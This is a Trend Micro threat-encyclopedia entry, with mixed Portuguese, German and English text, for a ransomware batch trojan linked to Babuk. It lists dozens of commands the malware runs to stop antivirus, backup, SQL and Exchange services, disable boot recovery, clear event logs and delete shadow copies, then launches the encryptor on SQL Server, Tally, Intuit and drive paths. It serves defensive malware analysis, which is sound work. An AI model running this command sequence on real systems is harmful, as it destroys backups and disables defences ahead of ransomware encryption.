Trojan.BAT.BABUK.YACGY
Trojan:BAT/MegaCortex.SC(MICROSOFT)
Plataforma:
Windows
Classificao do risco total:
Potencial de dano:
Potencial de distribuição:
infecção relatada:
Exposição das informações:
Baixo
Medium
Alto
Crítico
Tipo de grayware:
Trojan
Destrutivo:
Não
Criptografado:
In the Wild:
Sim
Visão geral
Canal de infecção: Aus dem Internet heruntergeladen, Fallen gelassen von anderer Malware
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Löscht Dateien, so dass Programme und Anwendungen nicht ordnungsgemäß ausgeführt werden.
Detalhes técnicos
Tipo de compactação: 8,729 bytes
Tipo de arquivo: BAT
Residente na memória: Não
Carga útil: Adds processes
Übertragungsdetails
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
Fügt die folgenden Prozesse hinzu:
- {Malware Fullpath}\HelpPane.exe → Detected as Trojan.Win32.KILLAV.WLEBB
- taskkill /f /im sqlservr.exe
- net stop VSS /y
- net stop HealthTLService /y
- net stop ThreatLockerService /y
- net stop "Veritas System Recovery" /y
- net stop EPIntegrationService /y
- net stop EPProtectedService /y
- net stop EPRedline /y
- net stop EPSecurityService /y
- net stop "Client Agent 7.60" /y
- net stop WRSVC /y
- net stop SQLAgent$SYSTEM_BGC /y
- net stop "Sophos Device Control Service" /y
- net stop macmnsvc /y
- net stop SQLAgent$ECWDB2 /y
- net stop "Zoolz 2 Service" /y
- net stop McTaskManager /y
- net stop "Sophos AutoUpdate Service" /y
- net stop "Sophos System Protection Service" /y
- net stop EraserSvc11710 /y
- net stop PDVFSService /y
- net stop SQLAgent$PROFXENGAGEMENT /y
- net stop SAVService /y
- net stop MSSQLFDLauncher$TPSAMA /y
- net stop SQLAgent$SOPHOS /y
- net stop "Symantec System Recovery" /y
- net stop Antivirus /y
- net stop SstpSvc /y
- net stop MSOLAP$SQL_2008 /y
- net stop TrueKeyServiceHelper /y
- net stop sacsvr /y
- net stop VeeamNFSSvc /y
- net stop FA_Scheduler /y
- net stop SAVAdminService /y
- net stop EPUpdateService /y
- net stop VeeamTransportSvc /y
- net stop "Sophos Health Service" /y
- net stop bedbg /y
- net stop MSSQLSERVER /y
- net stop KAVFS /y
- net stop Smcinst /y
- net stop MSSQLServerADHelper100 /y
- net stop TmCCSF /y
- net stop wbengine /y
- net stop SQLWriter /y
- net stop MSSQLFDLauncher$TPS /y
- net stop SmcService /y
- net stop ReportServer$TPSAMA /y
- net stop swi_update /y
- net stop AcrSch2Svc /y
- net stop MSSQL$SYSTEM_BGC /y
- net stop VeeamBrokerSvc /y
- net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
- net stop VeeamDeploymentService /y
- net stop SQLAgent$TPS /y
- net stop DCAgent /y
- net stop "Sophos Message Router" /y
- net stop MSSQLFDLauncher$SBSMONITORING /y
- net stop MySQL80 /y
- net stop MSOLAP$SYSTEM_BGC /y
- net stop ReportServer$TPS /y
- net stop MSSQL$ECWDB2 /y
- net stop SntpService /y
- net stop SQLSERVERAGENT /y
- net stop BackupExecManagementService /y
- net stop SMTPSvc /y
- net stop mfefire /y
- net stop BackupExecRPCService /y
- net stop MSSQL$VEEAMSQL2008R2 /y
- net stop klnagent /y
- net stop MSExchangeSA /y
- net stop MSSQLServerADHelper /y
- net stop SQLTELEMETRY /y
- net stop "Sophos Clean Service" /y
- net stop swi_update_64 /y
- net stop "Sophos Web Control Service" /y
- net stop EhttpSrv /y
- net stop POP3Svc /y
- net stop MSOLAP$TPSAMA /y
- net stop McAfeeEngineService /y
- net stop "Veeam Backup Catalog Data Service" /y
- net stop MSSQL$SBSMONITORING /y
- net stop ReportServer$SYSTEM_BGC /y
- net stop AcronisAgent /y
- net stop KAVFSGT /y
- net stop BackupExecDeviceMediaService /y
- net stop MySQL57 /y
- net stop McAfeeFrameworkMcAfeeFramework /y
- net stop TrueKey /y
- net stop VeeamMountSvc /y
- net stop MsDtsServer110 /y
- net stop SQLAgent$BKUPEXEC /y
- net stop UI0Detect /y
- net stop ReportServer /y
- net stop SQLTELEMETRY$ECWDB2 /y
- net stop MSSQLFDLauncher$SYSTEM_BGC /y
- net stop MSSQL$BKUPEXEC /y
- net stop SQLAgent$PRACTTICEBGC /y
- net stop MSExchangeSRS /y
- net stop SQLAgent$VEEAMSQL2008R2 /y
- net stop McShield /y
- net stop SepMasterService /y
- net stop "Sophos MCS Client" /y
- net stop VeeamCatalogSvc /y
- net stop SQLAgent$SHAREPOINT /y
- net stop NetMsmqActivator /y
- net stop kavfsslp /y
- net stop tmlisten /y
- net stop ShMonitor /y
- net stop MsDtsServer /y
- net stop SQLAgent$SQL_2008 /y
- net stop SDRSVC /y
- net stop IISAdmin /y
- net stop SQLAgent$PRACTTICEMGT /y
- net stop BackupExecJobEngine /y
- net stop BackupExecAgentBrowser /y
- net stop VeeamHvIntegrationSvc /y
- net stop masvc /y
- net stop W3Svc /y
- net stop "SQLsafe Backup Service" /y
- net stop SQLAgent$CXDB /y
- net stop SQLBrowser /y
- net stop MSSQLFDLauncher$SQL_2008 /y
- net stop VeeamBackupSvc /y
- net stop "Sophos Safestore Service" /y
- net stop svcGenericHost /y
- net stop ntrtscan /y
- net stop SQLAgent$VEEAMSQL2012 /y
- net stop MSExchangeMGMT /y
- net stop SamSs /y
- net stop MSExchangeES /y
- net stop MBAMService /y
- net stop EsgShKernel /y
- net stop ESHASRV /y
- net stop MSSQL$TPSAMA /y
- net stop SQLAgent$CITRIX_METAFRAME /y
- net stop VeeamCloudSvc /y
- net stop "Sophos File Scanner Service" /y
- net stop "Sophos Agent" /y
- net stop MBEndpointAgent /y
- net stop swi_service /y
- net stop MSSQL$PRACTICEMGT /y
- net stop SQLAgent$TPSAMA /y
- net stop McAfeeFramework /y
- net stop "Enterprise Client Service" /y
- net stop SQLAgent$SBSMONITORING /y
- net stop MSSQL$VEEAMSQL2012 /y
- net stop swi_filter /y
- net stop SQLSafeOLRService /y
- net stop BackupExecVSSProvider /y
- net stop VeeamEnterpriseManagerSvc /y
- net stop SQLAgent$SQLEXPRESS /y
- net stop OracleClientCache80 /y
- net stop MSSQL$PROFXENGAGEMENT /y
- net stop IMAP4Svc /y
- net stop ARSM /y
- net stop MSExchangeIS /y
- net stop AVP /y
- net stop MSSQLFDLauncher /y
- net stop MSExchangeMTA /y
- net stop TrueKeyScheduler /y
- net stop MSSQL$SOPHOS /y
- net stop "SQL Backups" /y
- net stop MSSQL$TPS /y
- net stop mfemms /y
- net stop MsDtsServer100 /y
- net stop MSSQL$SHAREPOINT /y
- net stop mfevtp /y
- net stop msftesql$PROD /y
- net stop mozyprobackup /y
- net stop MSSQL$SQL_2008 /y
- net stop SNAC /y
- net stop ReportServer$SQL_2008 /y
- net stop BackupExecAgentAccelerator /y
- net stop MSSQL$SQLEXPRESS /y
- net stop MSSQL$PRACTTICEBGC /y
- net stop VeeamRESTSvc /y
- net stop sophossps /y
- net stop ekrn /y
- net stop MMS /y
- net stop "Sophos MCS Agent" /y
- net stop RESvc /y
- net stop "Acronis VSS Provider" /y
- net stop MSSQLFDLauncher$SHAREPOINT /y
- net stop "SQLsafe Filter Service" /y
- net stop MSSQL$PROD /y
- net stop SQLAgent$PROD /y
- net stop MSOLAP$TPS /y
- net stop VeeamDeploySvc /y
- net stop MSSQLServerOLAPService /y
- net stop "SQL Server (MSSQLSERVER)" /y
- net stop "SQL Server (SQLEXPRESS)" /y
- net stop "SQL Server Analysis Services (MSSQLSERVER)" /y
- net stop "SQL Server Integration Services 11.0" /y
- net stop "SQL Server Reporting Services (MSSQLSERVER)" /y
- net stop "SQL Server VSS Writer" /y
- bcdedit /set {default} recoveryenabled No
- bcdedit /set {default} bootstatuspolicy ignoreallfailures
- wmic SHADOWCOPY /nointeractive
- wevtutil cl security
- wevtutil cl system
- wevtutil cl application
- vssadmin delete shadows /all /quiet
- net stop mhyprot2 /y
- {Malware Fullpath}\svchost.exe → Detected as Ransom.Win32.BABUK.YACGY
- {Malware Fullpath}\svchost.exe -paths="C:\Program Files\Microsoft SQL Server"
- {Malware Fullpath}\svchost.exe -paths="C:\Program Files (x86)\Microsoft SQL Server"
- {Malware Fullpath}\svchost.exe -paths="D:\Program Files\Microsoft SQL Server"
- {Malware Fullpath}\svchost.exe -paths="D:\Program Files (x86)\Microsoft SQL Server"
- {Malware Fullpath}\svchost.exe -paths="E:\Program Files\Microsoft SQL Server"
- {Malware Fullpath}\svchost.exe -paths="E:\Program Files (x86)\Microsoft SQL Server"
- {Malware Fullpath}\svchost.exe -paths="F:\Program Files\Microsoft SQL Server"
- {Malware Fullpath}\svchost.exe -paths="F:\Program Files (x86)\Microsoft SQL Server"
- {Malware Fullpath}\svchost.exe -paths="C:\Program Files (x86)\Tally.ERP9"
- {Malware Fullpath}\svchost.exe -paths="D:\Program Files (x86)\Tally.ERP9"
- {Malware Fullpath}\svchost.exe -paths="E:\Program Files (x86)\Tally.ERP9"
- {Malware Fullpath}\svchost.exe -paths="F:\Program Files (x86)\Tally.ERP9"
- {Malware Fullpath}\svchost.exe -paths="C:\Program Files (x86)\Intuit"
- {Malware Fullpath}\svchost.exe -paths="C:\Program Files\Intuit"
- {Malware Fullpath}\svchost.exe -paths=C:
- {Malware Fullpath}\svchost.exe -paths=D:
- {Malware Fullpath}\svchost.exe -paths=E:
- {Malware Fullpath}\svchost.exe -paths=Q:
- {Malware Fullpath}\svchost.exe -paths=F:
- {Malware Fullpath}\svchost.exe -paths=G:
- {Malware Fullpath}\svchost.exe -paths=H:
- {Malware Fullpath}\svchost.exe -paths=I:
- {Malware Fullpath}\svchost.exe -paths=Y:
Andere Systemänderungen
Löscht die folgenden Dateien:
- {Malware Fullpath}\mhyprot2.sys
Solução
Mecanismo de varredura mínima: 9.800
Primeiro arquivo padrão VSAPI: 17.714.07
Data do lançamento do primeiro padrão VSAPI: 28 julho 2022
VSAPI OPR Pattern Version: 17.715.00
VSAPI OPR Pattern veröffentlicht am: 29 julho 2022
Step 1
Für Windows ME und XP Benutzer: Stellen Sie vor einer Suche sicher, dass die Systemwiederherstellung deaktiviert ist, damit der gesamte Computer durchsucht werden kann.
Step 2
Durchsuchen Sie Ihren Computer mit Ihrem Trend Micro Produkt, und löschen Sie Dateien, die als Trojan.BAT.BABUK.YACGY entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem Trend Micro Produkt gesäubert, gelöscht oder in Quarantäne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarantäne können einfach gelöscht werden. Auf dieser Knowledge-Base-Seite finden Sie weitere Informationen.
Participe da nossa pesquisa!